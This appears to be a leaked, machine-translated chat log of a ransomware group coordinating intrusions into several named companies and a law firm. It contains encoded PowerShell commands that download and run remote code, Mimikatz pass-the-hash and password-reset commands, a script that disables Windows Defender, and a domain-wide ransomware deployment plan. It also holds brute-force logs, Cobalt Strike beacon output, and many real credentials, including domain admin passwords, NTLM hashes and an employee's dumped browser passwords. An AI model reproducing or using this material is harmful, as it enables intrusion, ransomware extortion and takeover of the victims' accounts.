If it does not appear, then the socket server has failed and you will not have interactivethe bottom left of the window pops up sockets coopedd when logging in the pschhe who have not noticed the pricholbytnu thin or moderately delayed in 5 characters go or so it also dies?write with your hands and you don't copy it, it stops responding after trying to insert it try to run powershell.it doesn't respondkmda it doesn't write so in general tpsh domain pinged visible or dasgenerate a new onethispowershell.exe -nop -w hidden -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB3AGkAZABlAGkAbwAuAGMAbwBtAC8AYQBzAHMAZQB0AHMALwBjAHMAcwAvAGIAbwBvAHQAcwB0AHIAYQBwAC4AbQBpAG4ALgBjAHMAcwA/AHYAaQBkAD0AWABjAGMAMwBSAFAAawBVAGMATwBEAHIAegBiAGQAagBJAFAAaQBIAHYAcABMAHcAYwBRAFUAcgBjAHkASQB6AHUAbABkAHcARQBFAGUAYQAnACkAKQA7AA== then write with your hands if you don't copypaste the loadpaste what are you trying to do?but the load doesn't paste something i clicked and it's been 5 minutes since then3 item super-duperper? below enter? something on elfiskom if it didn't paste mb not copied3 top after enter+win10?on my car the pcm doesn't work in kmd call the menu on your axis and see what item you have pasted then open cmd on your car I don't think (P) just find out what's in it. notepad.exe >> file >> open >> C:\system32 >> cmd.exe >> pcm >> gcnp right here write back as done@user7 help kmd what's erp, oa? I put everything that was run analogues? peptide*))8ethan.yu peptide1*leon leon20180928no access to directories, too. Of available only mozilla and some little things like Word and Isis. 
no shells:thumbsup:@user8 ``` http://citrix.peptide.cn/citrix/xenapp/auth/login.aspx leon leon20180928 http://citrix.peptide.cn:81/citrix/xenapp/auth/login.aspx mason peptide*))8 http://citrixen.peptide.cn/citrix/xenapp/auth/login.aspx leon leon20180928 http://citrix.peptide.cn:81/citrix/xenapp/auth/login.aspx ethan.yu peptide1 http://citrix.peptide.cn/citrix/xenapp/auth/login.aspx dgs00318 peptide1* http://citrix.peptide.cn/citrix/xenapp/auth/login.aspx ethan.yu peptide1* in this case there is something to work with) already told@user3 will tell us there is a variant of loading the script in the memory of the ps itself in the tpc file run is always disabled in fact i will try in the tpc import yet in problems - command, output already said i tried to import ps1 script by rd and run it writes disabled by the admin what does it mean to disable import and run if tpsh arrives? at least i tried to rdp in ps to do itkst, there is a neuter smblogin for ps anyway check hit then most likely already going back timer)no well it's possible, but i think i already made a noise)and when you start to make noise will not come?)polzak is dead, no his files 1) psh on the rpd, you hold a session polzak and if he flies in and sees the open psh and stuff will be unpleasant 2) tpsh can scan hosts by hash, check git@tl1 i can use that dll you gave me yesterday ?@tl1 Give me a clean cryptor devry.edu ``` Coba and arma are not attracted (in all likelihood some iron blocker traffic) Attracted tpsh, but what's the point of it if I have rdp psh attracted msf, raised the system on a virtual machine tried to scan network, session with a route or forwarding almost immediately dies Same with brute force on LA - roth and portfwd kill the session Broot on LA, each time resetting session, there is LA only on the same virutals useless ms17 kills it right away. 
I'm in the middle of a stalemate, thank you@user7 ``` https://ucfapps.cloud.com/citrix/storeweb/ je517380@ucf.edu Sawgrass20@ ``@user4 ``` https://studentappst.asu.edu/vpn/index.html egomez34 Pupilo10169! ``Create the group cpcc.edu I'm not there I'm not there everyone has tasks? for /f %%i in (ip.txt) do (copy wdoff.bat \\%%i\C$\ProgramData && wmic /node:%%i process call create "cmd /c wdoff.bat") `````` 10.0.0.25 10.0.20.222 10.10.0.118 10.0.10.131 10.0.0.24 10.0.10.103 10.0.10.96 10.0.10.101 10.0.10.134 10.10.0.131 10.0.10.133 10.0.10.35 10.0.20.231 10.0.20.83 10.10.0.134 10.0.10.168 10.0.10.116 10.10.0.117 10.10.0.135 10.10.20.131 10.0.10.111 10.10.20.126 10.0.10.126 172.17.0.8 10.0.10.129 10.0.10.163 10.0.10.93 10.0.10.83 10.10.0.103 10.0.20.100 10.0.10.143 10.10.0.129 10.0.10.9 172.17.0.13 10.0.10.139 10.0.10.117 10.0.10.12 10.0.10.110 172.17.0.13 192.168.0.228 192.168.0.69 10.0.20.160 192.168.5.114 10.0.20.187 10.0.10.137 192.168.0.15 10.0.10.91 192.168.0.35 10.0.10.125 `````` NEW NTLM : 04ddcbb1734a5a868580438cb75d7c2c `````` pth ITC\br_admin 555601b2d489ec2bfb7d189544736c8b mimikatz lsadump::changentlm /server:ITC.local /user:Administrator /old:0cc0cdacd8aa7f3b06e7cdfffa909b11 /newpassword:CAKE@horse369!@@321 ``make_token itc.local\br_admin CAKE@horse369!@@.`` Administrator bkupsvc br_admin bu_veeam eagle egl_admin egladmin egltech nk_admin PassportalSync paustin SLEAdmin superlogin vmware aadsync ````mimikatz lsadump::changentlm /server:sprouselaw /user:aandaservice /old:1737a8ca4966a1b4cf767232b0a4bd58 /newpassword:jackc!76DF37bd` new password for YES ``CAKE@horse369!@@321``Are we ready to start? ``` 1. pinging live WS. 2. Disable WinDef 3. Uninstall starter on WS + shut down Malware. 4. Spread starter on servers (in system32), except DC. On servers with SQL we stop SQL processes manually (net stop mssqlserver) or kill them. Run the starter manually. 5. Run starter domen-wide (psexec \\* -d -s -h start.exe -accepteula -y) 6. 
Extinguish DC ``EA: ``` * Username : egl_admin * Domain : ITC * Password : E@gle@x1s3030 ``` DA: ``` * Username : br_admin * Domain : ITC * Password : CAKE@horse369!@@ ``? or is there another one? Use KCunZoziQUNQQoJta54VhbE7Y8PD8FPDSGWulQ3gvxuiG7SFE4tGY4mHcaYmlFZM2107.161.126.162:15127 XloTvJNB02:51 PMsimple time here it does not crush our exe malwarebytes is installed on several servers (not BOLO) - uninstall it everything fresh pings and we can stop now? so what do we have here? so any list including password sqlpassword sa sa1 P@ssword Try that popular passwords there are usually no specific polices on "sa" accounts-tried to brute force "sa" accounts on skulls ? SQL Process: ITC-SQL01.ITC.LOCAL 10.0.0.16 ITCMA-SQL02.ITC.LOCAL 10.0.0.81 ITC-SHIP01.ITC.LOCAL 10.0.0.18 ITCMA-RDS01.ITC.LOCAL 10.0.0.8 ITCMA-FILE01.ITC.LOCAL 10.0.0.39 ITC-DC-SVR01.ITC.LOCAL 10.0.0.14 ``Let's do a little work on the rest of them now @tl1 is coming and let's get started @Tl1 @tl2What's up? are we starting? on the rdp went to the server to look at the malware, no ill did not make any noise?it's not cloudy I'm talking about launching it does not swear at startup, check the browser does not swear at the exea so on the fact of launching the cloud will fuck up and on 90% of the boot will chop the browser on the fact of loading or on the startup? 
192.168.0.227 ``` DisplayName : Malwarebytes Anti-Malware version 1.80.2.1012 DisplayVersion : 1.80.2.1012 Publisher : Malwarebytes Corporation InstallDate : 6/13/2019 12:00:00 AM Architecture : x86 DisplayName : Malwarebytes Anti-Exploit version 1.13.2.283 DisplayVersion : 1.13.2.283 Publisher : Malwarebytes InstallDate : 10/14/2020 12:00:00 AM Architecture : x64 ``ITCMA-FILE01 10.0.0.39 ``` DisplayName : Malwarebytes Anti-Malware version 1.80.2.1012 DisplayVersion : 1.80.2.1012 Publisher : Malwarebytes Corporation InstallDate : 6/13/2019 12:00:00 AM Architecture : x86 DisplayName : Malwarebytes Anti-Exploit version 1.13.2.283 DisplayVersion : 1.13.2.283 Publisher : Malwarebytes InstallDate : 10/13/2020 12:00:00 AM Architecture : x64 yes it seems, just the opposite when? always disconnected aposto mcafee as well? it is likely to catch on the dynamics in particular, now interested in malwarebytes bad enough@tl1 do we have statistics, how do antiviruses treat our builds? about the build for lin question, we should clarify so if everything is ready here, put the build> In the end, what is done is done. Yes, I just do not want to be and then there were discussions on this subject1) just look for accesses, keys, sessions in the system from the cars techs 2) check accesses and leave no traces 3) See what we need 4) clean the logs for themselves if we're talking about working with linuxxschnu means control through the scheme does not require a browser And if it had not done so would not have known NEVERThat's allThere's fucking authorization just look what is thereThat we do not watch the history of all browsers and not authorized in the LCwhy *Browser admin) what have not checked?It would not have been checked))) The point is that because they were in a hurry and did not check it, it remains a mystery50 to 50-50 it's a finger in the sky50/50 may well have been. 
that there may have been key nodes in the organization in those domains? ``` There might not have been key nodes in those domains? what diap was scanned? that there might have been key nodes in the organization in those domains? what does that tell you? Can you explain without making assumptions, does having a couple more domains say anything? no more And this is all just your guesses Outsourced accounting yf jnenjhst scale of 20 pc? accounting and offices if not dead yet, it at least has a logistics company has been around for half a centuryhttp://www.pkgprod.com/our-history/ and well yes lastset he has earlier``? pwdlastset : 8/17/2020 4:36:45 PM mailnickname : Louisad `````` pwdlastset : 7/4/2013 2:00:27 PM `````` [*] 10.7.20.80:445 - 10.7.20.80:445 - Correct credentials, but unable to login: 'matches\mercedesd:Dinham2323', [*] 10.7.20.120:445 - 10.7.20.120:445 - Correct credentials, but unable to login: 'matches\mercedesd:Dinham2323', [*] 10.7.20.70:445 - 10.7.20.70:445 - Correct credentials, but unable to login: 'matches\mercedesd:Dinham2323', [*] 10.7.20.30:445 - 10.7.20.30:445 - Correct credentials, but unable to login: 'matches\mercedesd:Dinham2323', [*] 10.7.20.190:445 - 10.7.20.190:445 - Correct credentials, but unable to login: 'matches\mercedesd:Dinham2323', [*] 10.7.20.120:445 - 10.7.20.120:445 - Correct credentials, but unable to login: 'matches\mercedesd:Dinham2323', ``a well lassset''. whencreated : 5/20/2014 11:39:09 AM samaccountname : Louisad ``Well, there ``couldn't be a 2020 there since ``` mdbusedefaults : True whencreated : 7/4/2013 12:00:27 PM name : Veeam Backup badpwdcount : 0 useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD usncreated : 46175 primarygroupid : 513 pwdlastset : 7/4/2013 2:00:27 PM `````` M@tches2020! M@tches2020! M@tches2020! Matches2014 matches123 matches123! matches123!!! m@tches123 m@tches123! m@tches123!!! Matches123! Matches123! Matches123!!! 
M@tches123 M@tches123! M@tches123!!! Dinham2323! Dinham2323! Dinham2323!!! Dinh@m2323! Dinh@m2323! Dinh@m2323!!! ``what was the vocabulary? I can't know, ``net accounts /dom`` don't work out... how many failed attempts were there? that's too bad``. [-] 10.7.20.30:445 - Account lockout detected on 'Veeam', skipping this user. `````` [+] 10.7.20.30:445 - 10.7.20.30:445 - Success: 'matches.com\Louisad:M@tches202020! [+] 10.7.20.55:445 - 10.7.20.55:445 - Success: 'matches.com\Louisad:M@tches202020!!!' [+] 10.7.20.60:445 - 10.7.20.60:445 - Success: 'matches.com\Louisad:M@tches202020!!!' [+] 10.7.20.70:445 - 10.7.20.70:445 - Success: 'matches.com\Louisad:M@tches202020!!!' [+] 10.7.20.80:445 - 10.7.20.80:445 - Success: 'matches.com\Louisad:M@tches202020!!!' [+] 10.7.20.120:445 - 10.7.20.120:445 - Success: 'matches.com\Louisad:M@tches202020!!!' [+] 10.7.20.190:445 - 10.7.20.190:445 - Success: 'matches.com\Louisad:M@tches202020!!!' ``Run the relay with a command like - powershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAnAGgAdAB0AHAOgvAC8AMAyADcALgAwAC4AMAAuADEAOgAzADYANQA0ADEALwAnACkA not understood about the allnailer team) We caught a couple of users yesterday does it make sense to run invei relay with the invei team? and give me a list of processes from her pc still scan the mercedes creeds, maybe he where an admin put + brute force users from this group `CN=sec_WorkstationLocalAdmin` try to scan that admin with a dot ``. [+] 10.7.20.30:445 - 10.7.20.30:445 - Success: '.\Louisad:M@tches2020! ``See if there were any hooks to their skul serversDidn't you shoot/search for them? There are 3 polzak, try it-this group was brutalized? `CN=sec_WorkstationLocalAdmin` No `Microsoft SQL Server 2012 Native Client` anything from here? 
Microsoft Dynamics NAV RoleTailored Client 7.1.36703.0 Microsoft Dynamics NAV Setup 7.1.36703.0 British Module for Microsoft Dynamics NAV Role Tailored Client 7.1.36703.0 Office 16 Click-to-Run Extensibility Component 16.0.11929.20606 Office 16 Click-to-Run Localization Component 16.0.11929.20606 Office 16 Click-to-Run Licensing Component 16.0.11929.20606 Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.40660 12.0.40660 Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 10.0.40219 Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219 HP Support Solutions Framework 12.13.42.1 Microsoft SQL Server 2012 Native Client 11.0.2100.60 Open XML SDK 2.5 for Microsoft Office 2.5.5631 ESET Endpoint Encryption 5.0.0.0 CarbonBlack Sensor 6.2.1 Jet Excel Add-In 16.1.17061.0 Microsoft System CLR Types for SQL Server 2012 11.0.2100.60 Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.40660 12.0.40660 ESET Management Agent 7.0.577.0 Microsoft SQL Server 2005 Analysis Services ADOMD.NET 9.00.3042.00 Local Administrator Password Solution 6.2.0.0 Adobe Refresh Manager 1.8.0 Adobe Acrobat Reader DC 20.012.20048 Configuration Manager Client 5.00.8913.1000 Netop Remote Control Host 12.83.20175 Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.40660 12.0.40660 Google Update Helper 1.3.35.451 Microsoft Report Viewer 2012 Runtime 11.1.3010.3 Microsoft Visual Studio 2010 Tools for Office Runtime (x64) 10.0.50330 Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.40660 12.0.40660 FortiClient 6.0.9.0277 Microsoft Policy Platform 68.1.1010.0 ``Try set .it's default as .so it's default as WORKSTATION maybe? I didn't specify any domain just it says here with "." and there with workstation `` [+] 10.5.6.21:445 - 10.5.6.21:445 - Success: '.\conn-selmer:&Green27!' [+] 10.4.1.113:445 - 10.4.1.113:445 - Success: '.\conn-selmer:&Green27!' [+] 10.1.7.226:445 - 10.1.7.226:445 - Success: '.\conn-selmer:&Green27!' 
[+] 10.1.6.6:445 - 10.1.6.6:445 - Success: '.\conn-selmer:&Green27!' [+] 10.1.7.224:445 - 10.1.7.224:445 - Success: '.\conn-selmer:&Green27!' [+] 10.1.7.192:445 - 10.1.7.192:445 - Success: '.\conn-selmer:&Green27!' `` but with . but with '.''? Pinging UKHECSLT3028.matches.com [10.20.4.4] with 32 bytes of data: Request timed out. Request timed out. ``This admin was not enabled at all on the Mercedes, I gave him this passwordUKHECSLT3028 and it is visible? and with these accesses checked? [+] 10.7.20.30:445 - 10.7.20.30:445 - Success: 'matches\Louisad:M@tches2020! [+] 10.7.20.60:445 - 10.7.20.60:445 - Success: 'matches\Louisad:M@tches202020!!!' [+] 10.7.20.55:445 - 10.7.20.55:445 - Success: 'matches\Louisad:M@tches202020!!!' [+] 10.7.20.70:445 - 10.7.20.70:445 - Success: 'matches\Louisad:M@tches202020!!!' [+] 10.7.20.80:445 - 10.7.20.80:445 - Success: 'matches\Louisad:M@tches202020!!!' [+] 10.7.20.190:445 - 10.7.20.190:445 - Success: 'matches\Louisad:M@tches202020!!!' ``She didn't have winscp,ftp,putty,teamviewer...? then so far all the scans that have access and open 445 just hung file 0b and that's it ``regression-app-portal.matcheslocal.com [10.5.53.111]``what hosts did you check on ms17? did you check all the trusts? i.e. you didn't try on ms17? and what hosts did you check? did you only scan 2003? did you add his password to the brute force dictionary for yes? did you write "." did you write workstation? and with the admin account i assume the same situation? for the test do a couple of hosts, ok try it with the domain in this case you found it registered outside the domain, which is strange he may be registered as LA with a domain account somewhere) if you put the domain, it is clear he will write Success everywhere) we scanned the local admins in the domain put "." 
or so I do not understand it and did not write in Conn-selmer, and gave out with the admin did not writeJust these should be his valid credentials and it everywhere to be as Success without an admina you when you scanned the domain did not write?aha)ah, well he's not an admin there didn't you go there?[ ](https://mediaeveryone.com/group/matches?msg=MbnvaHGsoKr8b6P2o) did you check this account[ ](https://mediaeveryone.com/group/matches?msg=NjWhmgmX7wnJK2TL3) did you check other hosts as LA?[ ](https://mediaeveryone.com/group/matches?msg=T8c6EfFFgKzH28gbc) and what's the polzak and what kind of machine? and the sloits about exec want SA with the password they sql 2017 stands brute force -brute force sploit -dav in principle and on our deck on their network, too it's about scan from the deck under vpnomsploits by? on her machine - yes so we have tried everything? just wait?) she computer reboot rarely (27 last time), and go on rdp and turn it on the vpn only option that we can do with this machineNo, + maximum palevostiU on her pc is enabled NLA - on rdp does not allow to connect We disabled it through the registry, but we have to reboot the computer for the changes to take effect. if we reboot her computer and after the reboot will hang authorization window - our session will not come? mbh on the use of pshno I did not stay long and did not have time to review something by the way when the load tpsh ran, I just what just try to respawn or do not risk to rdp to climb?in the cob the session sagged, in the tpsh not responding why strange? rights just do not exist ... strangeadmin's balloon is only on the current machine `` [*] Parsed 39 computer objects. 
Serious policies by the way. Force user logoff how long after time expires?: Never Minimum password age (days): 1 Maximum password age (days): 42 Minimum password length: 8 Length of password history maintained: 2 Lockout threshold: 5 Lockout duration (minutes): 3 Lockout observation window (minutes): 3 Computer role: PRIMARY :zany_face: we've been exposed, finita la comedy, with dns cache in the sitbelt was: Entry : wikibros.com Name : wikibros.com Data : 23.106.160.61 Entry : wideio.com Name : Data : Entry : wideio.com Name : wideio.com Data : 23.19.227.186 The check #general. Get-PSReadLineOption The term 'Get-PSReadLineOption' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. You're welcome to see history file path or something like that after execution. Can you remind me the command to clean the psh, please? ok, ok, work until you get to the psh?
No kerbs, no rubus (kerb, asrep), no invoc kerb found anything can you continue to report the results of the workahahahahahahais now will remove the kerbsNet-GPPPassword did not give anything just reported the situation I did not say that there is nothing and do nothing but the car in the domain and it opens a lot of vectors current car - the server, but I am not LA there` `` Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- dsechrist kkohl ``` ``` Group name Enterprise Admins Comment Designated administrators of the enterprise Members ------------------------------------------------------------------------------- dsechrist kkohl ``` ``` Alias name Administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- dsechrist STG-HEALTHCARE\Domain Admins ``NON-DOMAIN ``` SCCY-MODUSLT SCCY-PRODUCTION VANNDATA DESKTOP-GP0L2NF DESKTOP-15BLUKS DESKTOP-TEODH7E 0EA78803 The second one has a lot of links to shared resources. In general, these satellites are more like filewashing sites. the one that has the craps has a capacity of 1Tb what is there at all? 
History (VDSADMIN): huntress-installers.s3.amazonaws.com This is us between us and where? NAS datto control center ts sccy-fs mfgwin10-1 want to get the account from here. huntress. i give you a link to the softs QR Go to the link What kind of protection? a conspiracy of lokers it is protection from lokers see we are not the first)) they found on their computer, what is it?
``YES`` ``` InstallA NOC_HelpDesk Passportal_Srvc VannData vdsadmin ``` EA ``` InstallA VannData vdsadmin ``` SA ``` InstallA sccyadmin ``not a fact, but it's very likely that they are not there at the third party service[ ](https://mediaeveryone.com/group/sccy-com?msg=2CqXrpzsQwqiizHbN) ?waiting for a list of external backups still prepare to closeuser8user3 and I'm waiting for the crd from nasovtut to close today?the question was where are we wasting our time in general, I'm not talking about this network where 21k nets are the quietest waysshaprhoud\accesses to the sharas*try eleveits\shaprhoud\accesses to the sharas*gather comps and servers where to brute force a different way to tell me how you waste time while collecting hell? (I always run after collecting info+ where are the hashes?rubeus i always started after gathering information + where are the hashes? -would it be quieter to gather by handWhy tulchy new domainCan always start with this (YES LA EA adinfo)the question is why the fuck do i know that this is from tulchynae know what or how it is connected, but after the adfind finished files and the archive started downloading the session diedwhy use it? [*] Tasked beacon to run .NET program: check.exe adflogs [+] host called home, sent: 110661 bytes [+] received output: 333301283 [*] Tasked beacon to run .NET program: check.exe adflogs [+] host called home, sent: 110661 bytes [+] received output: 398533948 [*] Tasked beacon to run .NET program: check.exe adflogs [+] host called home, sent: 110661 bytes [+] received output: 437262015 ``Why is it definitely dead now (-from mathem.local there are still live sessions? It's too big if you work with it don't fuck it up``. Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- bbt0097 reconwindomp suQARSp_admin suWATprod The command completed successfully. 
``I spammed a new one, try it yourself there is only 1 session at all do any command and dies spamming session banally ask YES and the session dies everything is bad, just terrible, does not give anything to do all who have problems go to this coboo and work from there `` flexzap.com `````` 192.254.78.106:30504 sUSsQS7WpevaVL12GSMXs8Z10cXXski8ins ``cannot use eleveits@tl1 In the new coba from the user does not give anything to do ``` [-] could not spawn C:\WINDOWS\sysnative\wusa.exe: 740 [-] Could not connect to pipe: 2 ``hi:space_invader:hello it's the only method to dump chrome without a session on the machine we dumped the masterkey, and it's not coming, so we're trying to dump the masterkey with the file It's not like it's a backup, huh? I wonder what clupload has to do with it... Whatever, so do it. and offline solved the problem I threw how to pull chrome through DPAPI found a polzak masterkey that goes to malwarenu to decrypt the DPAPI content chrome in sharp chrome master-key can somehow work? maybe from it a folder OutLook I don't know it doesn't say anything...and sitbell search for credentials came up login credentials.jpg ``` C:\Users\johni\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\58CKFMPE What is this and where does it come from? Search for cloud storage access further in the browserswhich software accesses these cloudsand then find out what it is and understand what it is NAS/network hardware or what see what admin is hanging out there and blow on the 80/443 ports to figure out what's up with the host already i'm thinking how the hell it was!!!!!!!!!``` it's on d ``` ls \hostname\d$ gives an output or what? I do not know how to comment on the attempt to copy inaccessible dira what to do in this case is obvious in my opinion, sorry it's all open ports3389 can be checked in hell you can check what axis is still open? 
if the drive C does not exist - there can only be one fucking obvious assumption) it's not even an error to correct you somewhere you try to copy the file to a non-existent dira I do not know what to add you are so verbose ... (ICMP) Target '192.168.100.97' is alive. [read 8 bytes] [+] received output: 192.168.100.97:443 [+] received output: 192.168.100.97:80 192.168.100.97:22 (SSH-2.0-dropbear_2014.63) ``Scan to everything''. usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 01:00:27> shell dir \\desktop-33jh80d.sprouselaw.com\c$ [*] Tasked beacon to run: dir \\desktop-33jh80d.sprouselaw.com\c$ [+] host called home, sent: 70 bytes [+] received output: The network path was not found. ``22shell dir \\desktop-33jh80d.sprouselaw.com\c$already tried445 which ports can be scanned? usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:58:27> shell net view \\desktop-33jh80d.sprouselaw.com [*] Tasked beacon to run: net view \desktop-33jh80d.sprouselaw.com [+] host called home, sent: 72 bytes [+] received output: System error 53 has occurred. The network path was not found. ``` same kind of ballyhoo then so yeah. Name: desktop-33jh80d.sprouselaw.com Address: 192.168.100.97 ``` that's his host, the one you threw in is DK \zion.sprouselaw.com ``but try the hostname`` usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:49:54> shell net view \\\192.168.100.97 [*] Tasked beacon to run: net view \\192.168.100.97 [+] host called home, sent: 56 bytes [+] received output: System error 53 has occurred. The network path was not found. 
usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:53:59> shell ping 192.168.100.97 -n 1 [*] tasked beacon to run: ping 192.168.100.97 -n 1 [+] host called home, sent: 55 bytes [+] received output: Pinging 192.168.100.97 with 32 bytes of data: Reply from 192.168.100.97: bytes=32 time<1ms TTL=64 Ping statistics for 192.168.100.97: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:54:48> shell nslookup 192.168.100.97 [*] Tasked beacon to run: nslookup 192.168.100.97 [+] host called home, sent: 54 bytes [+] received output: Server: zion.sprouselaw.com Address: 192.168.100.240 Name: desktop-33jh80d.sprouselaw.com Address: 192.168.100.97 ``` I don't know what to do, there is no view on the host/ipnu scan to the win ports How can you check this? I'm not sure of anything in life so how do you copy to a folder you can't see? are you sure it's a win machine? @user8 from any machine as long as the machine sees all domain controllers usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:44:06> ls \\\192.168.100.97\C$\ [*] Tasked beacon to list files in \\192.168.100.97\C$\ [+] host called home, sent: 37 bytes [-] could not open \192.168.100.97\C$\*: 53 usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:44:50> ls \\192.168.100.97\C$\ProgramData [*] Tasked beacon to list files in \192.168.100.97\C$\ProgramData [+] host called home, sent: 49 bytes [-] could not open \192.168.100.97\C$\ProgramData\*: 53 Sure it works on any machine or is it better with the DK? Is the folder accessible? And with ls \192.168.100.97\C$\ProgramData@tl2 ``` usr2-2-2[DOUGLAS-PC]SYSTEM */12596|2020Oct13 00:41:13> shell copy C:\ProgramData\updates.dll \\\192.168.100.97\C$\ProgramData\ [*] Tasked beacon to run: copy C:\ProgramData\updates.dll \\192.168.100.97\$\ProgramData\ [+] host called home, sent: 95 bytes [+] received output: The network path was not found. 
0 file(s) copied. @user7 for what reason? What failed? 192.168.100.238 + I connected and it just froze, then I couldn't get the dll on it 192.168.100.97 - 192.168.100.98 - 192.168.100.99 - 192.168.100.94 - 192.168.100.95 - couldn't get on these machines http://habr.com/ru/post/434514/ on DA computer installed PasswordsPlus
@user9 well if you can see the login there - it makes sense to try any other creds with the login of this polzak + Does it start without comma? remote-exec psexec 192.168.100.103 rundll32 C:\ProgramData\1580759637.bdinstall.dll entryPoint shell copy 1580759637.bdinstall.dll \\\192.168.100.103\C$\ProgramData\ Look for notes from this username @tl2 found a computer where the admin goes to https://cloud.malwarebytes.com/ but it won't unlock the chrome credentials. tried with dpapi:chrome and sharpchrome prints out empty passwords.
--- Chromium Credential (User: douglas) --- URL : https://tx.countygovernmentrecords.com/texas/web/loginPOST.jsp;jsessionid=3AF15044DA2A27D57AED078F8544455B Username : douglas.brooking@sprouselaw.com Password : Sprouse2019 --- Chromium Credential (User: douglas) --- URL : https://www.texasfile.com/login/ Username : taylor.kelley@sprouselaw.com Password : Gorebels1856 --- Chromium Credential (User: douglas) --- URL : https://direct.sos.state.tx.us/acct/acct-login.asp Username : 10245062 Password : sprouse2017 --- Chromium Credential (User: douglas) --- URL : https://unitedhealthcaremotion.com/Home/LoginPartial Username : douglas.brooking@sprouselaw.com Password : Natwwal1214! --- Chromium Credential (User: douglas) --- URL : https://www.myuhc.com/member/prewelcome.do Username : Password : Natwwal1214! --- Chromium Credential (User: douglas) --- URL : https://us1.proofpointessentials.com/app/login.php Username : douglas.brooking@sprouselaw.com Password : Natwwal1214! --- Chromium Credential (User: douglas) --- URL : https://pacer.login.uscourts.gov/csologin/login.jsf Username : Sprouse0124 Password : Ogitj@2020 --- Chromium Credential (User: douglas) --- URL : https://www.texasbarcle.com/cle/AALookupPassword.asp Username : doug.brooking@sprouselaw.com Password : Natwwal1214 --- Chromium Credential (User: douglas) --- URL : https://www.sos.ok.gov/client/cLoginRegistration.aspx Username : brooking Password : Sprouse2019 --- Chromium Credential (User: douglas) --- URL : https://pcl.uscourts.gov/pcl/index.jsf Username : Sprouse0124 Password : Ogitj@2020 --- Chromium Credential (User: douglas) --- URL : http://www.oilgas.org/EmailPassword.aspx Username : DBrooking05 Password : 24110605 --- Chromium Credential (User: douglas) --- URL : https://my.voya.com/voyasso/index.html Username : brookingd Password : Natwwal1214! 
--- Chromium Credential (User: douglas) --- URL : https://www.aa.com/loyalty/login/submit Username : 83JC1X6 Password : Natwwal1214 --- Chromium Credential (User: douglas) --- URL : https://www.delta.com/ Username : 9478151385 Password : Natwwal1214 --- Chromium Credential (User: douglas) --- URL : https://www.united.com/ual/en/us/account/account/login Username : LW762392 Password : Natwwal1214 --- Chromium Credential (User: douglas) --- URL : https://www.united.com/ual/en/us/account/account/login Username : *****392 Password : Natwwal1214 --- Chromium Credential (User: douglas) --- URL : https://www.aeroplan.com/log_in.do Username : 750173031 Password : Anastasia0623 --- Chromium Credential (User: douglas) --- URL : https://www.southwest.com/air/booking/index.html Username : 629692276 Password : Natwwal1214 --- Chromium Credential (User: douglas) --- URL : javascript:; Username : Brooking Password : Natwwal1214! --- Chromium Credential (User: douglas) --- URL : https://ondemand-relcs-02.fronteo.com/Relativity/Identity/login Username : doug.brooking@sprouselaw.com Password : Natwwal1214! --- Chromium Credential (User: douglas) --- URL : https://www.marriott.com/aries-auth/loginWithCredentials.comp Username : 660371613 Password : Natwwal1214 --- Chromium Credential (User: douglas) --- URL : Username : 1159185041 Password : Natwwal1214 --- Chromium Credential (User: douglas) --- URL : https://idp.elliemae.com/as/oopXr/resume/as/authorization.ping Username : dbrooking1020 Password : Natwwal1214! --- Chromium Credential (User: douglas) --- URL : https://scrcxp.pdhi.com/Portal/Member/4cb6782c-b48d-451e-96be-02d2a7b314a3 Username : dbrooking806 Password : Natwwal1214 --- Chromium Credential (User: douglas) --- URL : https://accounts.myuhc.com/rt/login/myuhc/en Username : Password : Natwwal1214! 
--- Chromium Credential (User: douglas) --- URL : https://texasstateparks.reserveamerica.com/memberSignInSignUp.do Username : douglas.brooking@sprouselaw.com Password : Geordi9392! --- Chromium Credential (User: douglas) --- URL : https://www.hilton.com/en/auth/login/ Username : 938312336 Password : Natwwal1214! ````Mitel/192.168.100.235/dbrooking\douglas Stasia9323``Mitel/192.168.100.235/msadler\matts Sprouse350``Mitel/192.168.100.235twd/msadler\matts Sprouse350` pay special attention to possible system backup --- Chromium Credential (User: matts) --- URL : https://www.att.com/my/ Username : matt.sadler@sprouselaw.com Password : kalley01 --- Chromium Credential (User: matts) --- URL : https://cprodmasx.att.com/commonLogin/igate_wam/multiLogin.do Username : matt.sadler@sprouselaw.com Password : kalley01 --- Chromium Credential (User: matts) --- URL : https://oidc.idp.clogin.att.com/mga/sps/authsvc Username : matt.sadler@sprouselaw.com Password : kalley01 ``` `matts-pc [192.168.100.93]```` beacon> pth SPROUSELAW.COM\aandaservice 1737a8ca4966a1b4cf767232b0a4bd58 [*] Tasked beacon to run mimikatz's sekurlsa::pth /user:aandaservice /domain:SPROUSELAW.COM 